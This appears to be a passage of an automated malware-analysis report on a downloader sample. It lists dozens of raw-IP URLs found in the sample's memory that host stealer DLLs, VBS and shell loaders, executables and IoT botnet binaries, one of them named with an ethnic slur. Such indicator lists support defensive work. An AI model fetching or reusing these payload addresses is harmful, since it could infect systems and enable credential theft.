                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.142.147.59/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.142.147.59/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.142.147.59/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.142.147.59/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.142.147.59/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.142.147.59/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.233.232.98/098d08abcf2b586b/freebl3.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.233.232.98/098d08abcf2b586b/mozglue.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.233.232.98/098d08abcf2b586b/msvcp140.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.233.232.98/098d08abcf2b586b/nss3.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.233.232.98/098d08abcf2b586b/softokn3.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.233.232.98/098d08abcf2b586b/sqlite3.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.233.232.98/098d08abcf2b586b/vcruntime140.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.42.33.121/%CE%A0%CE%91%CE%A1%CE%91%CE%93%CE%93%CE%95%CE%9B%CE%99%CE%91.vbs
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.42.33.121/VIBINVES.vbs
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.42.33.51/abyx.vbs
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.42.33.51/kwen.vbs
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.42.33.51/nicko.vbs
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.42.33.51/nigazxbb.vbs
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.42.33.51/nix.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.42.33.51/qasx.vbs
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.42.33.51/simxo.vbs
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.42.33.51/smito.vbs
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.42.33.68/vpnmhcvbszad/boblspsqgegf.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.93.77.186:5081/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.145.227.21/ldr.sh
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.145.227.21/ldr.sh?le0943_http
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.152.35.139:45737/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.169.175.232/autorun.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.169.175.233/setup.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.180.48.14:222/.RTX/cod.pdf
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.180.49.153/udp/rdpcllp.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.180.49.153/udp/taskhostclp.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.180.49.153/udp/taskmask.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.180.49.153/udp/taskmaskamd.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.208.56.60:14184/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.247.33.52:54341/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.3.177.220:58268/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.38.23.2/ldr.sh
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.38.23.2/sys.x86_64
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.144.235.42:56667/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.144.235.42:56667/Hajime
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.158.95.85:40467/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.164.132.134:24421/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.211.96.134/song.mp3
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.211.98.105/public/gffdgfdgfdg.msi
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.22.237.98:35989/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.223.19.229:6981/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.228.52.157:27314/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.24.131.192:18122/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.24.153.74:5997/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.64.169.119:48871/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.82.103.83:27653/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.218.35.174:35590/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.221.165.186:26343/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.210.197.185:23553/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.31.146.203:28226/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.44.40.12:45441/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.74.112.103/bins/jew.arm
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.74.112.103/bins/jew.arm5
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.74.112.103/bins/jew.arm6
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.74.112.103/bins/jew.m68k
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.74.112.103/bins/jew.mips
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.74.112.103/bins/jew.mpsl
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.74.112.103/bins/jew.sh4
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.74.112.103/bins/jew.spc
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.74.112.103/bins/jew.x86
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.74.112.103/jew.mips
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.74.112.103/jewn.sh
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.48.225.212/bins/sora.arm
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.48.225.212/bins/sora.arm5
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.48.225.212/bins/sora.arm6
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.48.225.212/bins/sora.arm7
